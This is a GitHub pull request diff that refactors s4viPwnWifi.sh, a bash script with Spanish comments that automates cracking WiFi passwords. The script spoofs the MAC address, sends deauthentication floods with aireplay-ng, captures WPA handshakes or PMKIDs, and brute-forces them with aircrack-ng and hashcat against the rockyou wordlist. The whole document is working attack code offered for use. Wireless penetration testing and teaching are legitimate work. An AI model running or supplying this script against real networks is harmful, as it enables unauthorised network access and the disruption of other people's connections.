Skip to content

refactor: Optimize and enhance s4viPwnWifi.sh script #2

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Open
wants to merge 1 commit into
base: master
Choose a base branch
from
Open

refactor: Optimize and enhance s4viPwnWifi.sh script #2

Changes from all commits
Commits
Show all changes
1 commit
Select commit
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
235 changes: 131 additions & 104 deletions s4viPwnWifi.sh
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -1,133 +1,160 @@
#!/bin/bash

# Author: s4vitar - nmap y pa' dentro
# Autor: s4vitar - nmap y pa' dentro

#Colours
# Colores
greenColour="\e[0;32m\033[1m"
endColour="\033[0m\e[0m"
redColour="\e[0;31m\033[1m"
blueColour="\e[0;34m\033[1m"
yellowColour="\e[0;33m\033[1m"
purpleColour="\e[0;35m\033[1m"
turquoiseColour="\e[0;36m\033[1m"
grayColour="\e[0;37m\033[1m"

export DEBIAN_FRONTEND=noninteractive

trap ctrl_c INT

function ctrl_c(){
echo -e "\n${yellowColour}[*]${endColour}${grayColour}Saliendo${endColour}"
tput cnorm; airmon-ng stop ${networkCard}mon > /dev/null 2>&1
rm Captura* 2>/dev/null
exit 0
# Función para manejar la interrupción (Ctrl+C)
function ctrl_c() {
echo -e "\n${yellowColour}[*]${endColour}${grayColour}Saliendo${endColour}"
tput cnorm
airmon-ng stop "${networkCard}mon" > /dev/null 2>&1
rm Captura* 2>/dev/null
exit 0
}

function helpPanel(){
echo -e "\n${yellowColour}[*]${endColour}${grayColour} Uso: ./s4viPwnWifi.sh${endColour}"
echo -e "\n\t${purpleColour}a)${endColour}${yellowColour} Modo de ataque${endColour}"
echo -e "\t\t${redColour}Handshake${endColour}"
echo -e "\t\t${redColour}PKMID${endColour}"
echo -e "\t${purpleColour}n)${endColour}${yellowColour} Nombre de la tarjeta de red${endColour}"
echo -e "\t${purpleColour}h)${endColour}${yellowColour} Mostrar este panel de ayuda${endColour}\n"
exit 0
# Función para mostrar el panel de ayuda
function helpPanel() {
echo -e "\n${yellowColour}[*]${endColour}${grayColour} Uso: ./s4viPwnWifi.sh${endColour}"
echo -e "\n\t${purpleColour}a)${endColour}${yellowColour} Modo de ataque${endColour}"
echo -e "\t\t${redColour}Handshake${endColour}"
echo -e "\t\t${redColour}PKMID${endColour}"
echo -e "\t${purpleColour}n)${endColour}${yellowColour} Nombre de la tarjeta de red${endColour}"
echo -e "\t${purpleColour}h)${endColour}${yellowColour} Mostrar este panel de ayuda${endColour}\n"
exit 0
}

function dependencies(){
tput civis
clear; dependencies=(aircrack-ng macchanger)
# Función para instalar las dependencias
function installDependencies() {
tput civis
clear
dependencies=("aircrack-ng" "macchanger")

echo -e "${yellowColour}[*]${endColour}${grayColour} Comprobando programas necesarios...${endColour}"
sleep 2

for program in "${dependencies[@]}"; do
echo -ne "\n${yellowColour}[*]${endColour}${blueColour} Herramienta${endColour}${purpleColour} $program${endColour}${blueColour}...${endColour}"

if command -v "$program" &>/dev/null; then
echo -e " ${greenColour}(V)${endColour}"
else
echo -e " ${redColour}(X)${endColour}\n"
echo -e "${yellowColour}[*]${endColour}${grayColour} Instalando herramienta ${endColour}${blueColour}$program${endColour}${yellowColour}...${endColour}"
apt-get install "$program" -y > /dev/null 2>&1
fi
sleep 1
done
}

# Función para iniciar el ataque
function startAttack() {
clear
echo -e "${yellowColour}[*]${endColour}${grayColour} Configurando tarjeta de red...${endColour}\n"
airmon-ng start "$networkCard" > /dev/null 2>&1
ifconfig "${networkCard}mon" down && macchanger -a "${networkCard}mon" > /dev/null 2>&1
ifconfig "${networkCard}mon" up
killall dhclient wpa_supplicant 2>/dev/null

echo -e "${yellowColour}[*]${endColour}${grayColour} Nueva dirección MAC asignada ${endColour}${purpleColour}[${endColour}${blueColour}$(macchanger -s "${networkCard}mon" | grep -i current | xargs | cut -d ' ' -f '3-100')${endColour}${purpleColour}]${endColour}"

if [ "$attack_mode" == "Handshake" ]; then
startHandshakeAttack
elif [ "$attack_mode" == "PKMID" ]; then
startPKMIDAttack
else
echo -e "\n${redColour}[*] Este modo de ataque no es válido${endColour}\n"
fi
}

# Función para iniciar el ataque de Handshake
function startHandshakeAttack() {
xterm -hold -e "airodump-ng ${networkCard}mon" &
airodump_xterm_PID=$!
echo -ne "\n${yellowColour}[*]${endColour}${grayColour} Nombre del punto de acceso: ${endColour}" && read -r apName
echo -ne "\n${yellowColour}[*]${endColour}${grayColour} Canal del punto de acceso: ${endColour}" && read -r apChannel

kill -9 "$airodump_xterm_PID"
wait "$airodump_xterm_PID" 2>/dev/null

echo -e "${yellowColour}[*]${endColour}${grayColour} Comprobando programas necesarios...${endColour}"
sleep 2
xterm -hold -e "airodump-ng -c $apChannel -w Captura --essid $apName ${networkCard}mon" &
airodump_filter_xterm_PID=$!

for program in "${dependencies[@]}"; do
echo -ne "\n${yellowColour}[*]${endColour}${blueColour} Herramienta${endColour}${purpleColour} $program${endColour}${blueColour}...${endColour}"
sleep 5
xterm -hold -e "aireplay-ng -0 10 -e $apName -c FF:FF:FF:FF:FF:FF ${networkCard}mon" &
aireplay_xterm_PID=$!
sleep 10
kill -9 "$aireplay_xterm_PID"
wait "$aireplay_xterm_PID" 2>/dev/null

test -f /usr/bin/$program
sleep 10
kill -9 "$airodump_filter_xterm_PID"
wait "$airodump_filter_xterm_PID" 2>/dev/null

if [ "$(echo $?)" == "0" ]; then
echo -e " ${greenColour}(V)${endColour}"
else
echo -e " ${redColour}(X)${endColour}\n"
echo -e "${yellowColour}[*]${endColour}${grayColour} Instalando herramienta ${endColour}${blueColour}$program${endColour}${yellowColour}...${endColour}"
apt-get install $program -y > /dev/null 2>&1
fi; sleep 1
done
xterm -hold -e "aircrack-ng -w /usr/share/wordlists/rockyou.txt Captura-01.cap" &
}

function startAttack(){
clear
echo -e "${yellowColour}[*]${endColour}${grayColour} Configurando tarjeta de red...${endColour}\n"
airmon-ng start $networkCard > /dev/null 2>&1
ifconfig ${networkCard}mon down && macchanger -a ${networkCard}mon > /dev/null 2>&1
ifconfig ${networkCard}mon up; killall dhclient wpa_supplicant 2>/dev/null

echo -e "${yellowColour}[*]${endColour}${grayColour} Nueva dirección MAC asignada ${endColour}${purpleColour}[${endColour}${blueColour}$(macchanger -s ${networkCard}mon | grep -i current | xargs | cut -d ' ' -f '3-100')${endColour}${purpleColour}]${endColour}"

if [ "$(echo $attack_mode)" == "Handshake" ]; then

xterm -hold -e "airodump-ng ${networkCard}mon" &
airodump_xterm_PID=$!
echo -ne "\n${yellowColour}[*]${endColour}${grayColour} Nombre del punto de acceso: ${endColour}" && read apName
echo -ne "\n${yellowColour}[*]${endColour}${grayColour} Canal del punto de acceso: ${endColour}" && read apChannel

kill -9 $airodump_xterm_PID
wait $airodump_xterm_PID 2>/dev/null

xterm -hold -e "airodump-ng -c $apChannel -w Captura --essid $apName ${networkCard}mon" &
airodump_filter_xterm_PID=$!

sleep 5; xterm -hold -e "aireplay-ng -0 10 -e $apName -c FF:FF:FF:FF:FF:FF ${networkCard}mon" &
aireplay_xterm_PID=$!
sleep 10; kill -9 $aireplay_xterm_PID; wait $aireplay_xterm_PID 2>/dev/null

sleep 10; kill -9 $airodump_filter_xterm_PID
wait $airodump_filter_xterm_PID 2>/dev/null

xterm -hold -e "aircrack-ng -w /usr/share/wordlists/rockyou.txt Captura-01.cap" &
elif [ "$(echo $attack_mode)" == "PKMID" ]; then
clear; echo -e "${yellowColour}[*]${endColour}${grayColour} Iniciando ClientLess PKMID Attack...${endColour}\n"
sleep 2
timeout 60 bash -c "hcxdumptool -i ${networkCard}mon --enable_status=1 -o Captura"
echo -e "\n\n${yellowColour}[*]${endColour}${grayColour} Obteniendo Hashes...${endColour}\n"
sleep 2
hcxpcaptool -z myHashes Captura; rm Captura 2>/dev/null

test -f myHashes

if [ "$(echo $?)" == "0" ]; then
echo -e "\n${yellowColour}[*]${endColour}${grayColour} Iniciando proceso de fuerza bruta...${endColour}\n"
sleep 2

hashcat -m 16800 /usr/share/wordlists/rockyou.txt myHashes -d 1 --force
else
echo -e "\n${redColour}[!]${endColour}${grayColour} No se ha podido capturar el paquete necesario...${endColour}\n"
rm Captura* 2>/dev/null
sleep 2
fi
else
echo -e "\n${redColour}[*] Este modo de ataque no es válido${endColour}\n"
fi
# Función para iniciar el ataque de PKMID
function startPKMIDAttack() {
clear
echo -e "${yellowColour}[*]${endColour}${grayColour} Iniciando ClientLess PKMID Attack...${endColour}\n"
sleep 2
timeout 60 bash -c "hcxdumptool -i ${networkCard}mon --enable_status=1 -o Captura"
echo -e "\n\n${yellowColour}[*]${endColour}${grayColour} Obteniendo Hashes...${endColour}\n"
sleep 2
hcxpcaptool -z myHashes Captura
rm Captura 2>/dev/null

if [ -f myHashes ]; then
echo -e "\n${yellowColour}[*]${endColour}${grayColour} Iniciando proceso de fuerza bruta...${endColour}\n"
sleep 2
hashcat -m 16800 /usr/share/wordlists/rockyou.txt myHashes -d 1 --force
else
echo -e "\n${redColour}[!]${endColour}${grayColour} No se ha podido capturar el paquete necesario...${endColour}\n"
rm Captura* 2>/dev/null
sleep 2
fi
}

# Main Function

if [ "$(id -u)" == "0" ]; then
declare -i parameter_counter=0; while getopts ":a:n:h:" arg; do
case $arg in
a) attack_mode=$OPTARG; let parameter_counter+=1 ;;
n) networkCard=$OPTARG; let parameter_counter+=1 ;;
h) helpPanel;;
esac
done

if [ $parameter_counter -ne 2 ]; then
helpPanel
else
dependencies
startAttack
tput cnorm; airmon-ng stop ${networkCard}mon > /dev/null 2>&1
fi
# Función Principal

if [ "$(id -u)" -eq 0 ]; then
declare -i parameter_counter=0
while getopts ":a:n:h:" arg; do
case $arg in
a)
attack_mode="$OPTARG"
let parameter_counter+=1
;;
n)
networkCard="$OPTARG"
let parameter_counter+=1
;;
h)
helpPanel
;;
esac
done

if [ "$parameter_counter" -ne 2 ]; then
helpPanel
else
installDependencies
startAttack
tput cnorm
airmon-ng stop "${networkCard}mon" > /dev/null 2>&1
fi
else
echo -e "\n${redColour}[*] No soy root${endColour}\n"
echo -e "\n${redColour}[*] No soy root${endColour}\n"
fi